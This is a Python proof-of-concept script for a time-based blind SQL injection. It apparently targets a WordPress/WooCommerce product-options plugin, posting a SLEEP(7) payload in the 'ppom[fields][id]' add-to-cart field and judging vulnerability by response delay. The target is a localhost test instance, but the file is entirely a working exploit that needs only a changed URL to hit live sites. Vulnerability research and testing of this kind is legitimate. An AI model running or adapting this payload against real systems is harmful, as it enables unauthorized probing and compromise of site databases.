import requests
import time
# Target of the single POST sent by exploit_sql_injection_onestep(); a
# local test instance (localhost), not a configurable/remote host.
PRODUCT_URL = "http://localhost/wp4hacking/product/product-testing/"
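def _print_verdict(duration: float, sleep_seconds: int, timed_out: bool) -> None:
    """Print the timing verdict for one request.

    A delay of at least ``sleep_seconds`` is reported as the injected
    SLEEP() having run; anything faster is reported as not vulnerable.
    ``timed_out`` only selects the wording of the explanation.
    """
    if duration >= sleep_seconds:
        if timed_out:
            print("\n[+] SUCCESS! 'Read timed out' occurred because the SLEEP(7) payload was executed.")
        else:
            print("\n[+] SUCCESS! The response was delayed by at least the SLEEP(7) payload.")
        print(" The site is vulnerable to Time-Based Blind SQL Injection.")
    elif timed_out:
        print("\n[-] FAILED. The timeout occurred too quickly, possibly a server issue.")
    else:
        print("\n[-] FAILED. The site responded too quickly. It does not seem vulnerable.")


def exploit_sql_injection_onestep():
    """Send one time-based payload to PRODUCT_URL and report the verdict.

    The check is purely timing based: the elapsed time of the POST is
    compared against the delay injected by the payload, whether the
    request completed or hit the read timeout. Any other request error is
    printed and swallowed. Returns None; all output goes to stdout.
    """
    # Must match the SLEEP() value embedded in sql_payload below.
    sleep_seconds = 7
    # The read timeout is deliberately longer than the injected delay, so a
    # server that executes SLEEP(7) normally *returns a response* after ~7s
    # rather than timing out. The original code only checked the elapsed
    # time in the ReadTimeout branch, so that case was reported as FAILED.
    request_timeout = 10
    sql_payload = "1 AND (SELECT 1 FROM (SELECT(SLEEP(7)))A)"
    add_to_cart_data = {
        'add-to-cart': '72',
        'quantity': '1',
        'ppom[fields][sql_injection]': 'test_value',
        'ppom[fields][id]': sql_payload,
        'ppom[ppom_option_price]': '""',
    }
    print("[*] Sending SQL Injection payload...")
    # monotonic() is immune to wall-clock adjustments during the request.
    started = time.monotonic()
    try:
        requests.post(PRODUCT_URL, data=add_to_cart_data, timeout=request_timeout)
    except requests.exceptions.ReadTimeout:
        duration = time.monotonic() - started
        print(f" Request timed out after {duration:.2f} seconds.")
        _print_verdict(duration, sleep_seconds, timed_out=True)
    except requests.exceptions.RequestException as e:
        print(f"[!] An unexpected error occurred: {e}")
    else:
        duration = time.monotonic() - started
        print(f" Request finished in {duration:.2f} seconds (no timeout).")
        _print_verdict(duration, sleep_seconds, timed_out=False)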
def main() -> None:
    """Script entry point: print the preamble, then run the one-step check."""
    print("Attempting SQL Injection PoC (One-Step Method)...")
    print("Make sure 'Enable Legacy Price Calculations' is active.")
    exploit_sql_injection_onestep()


if __name__ == "__main__":
    main()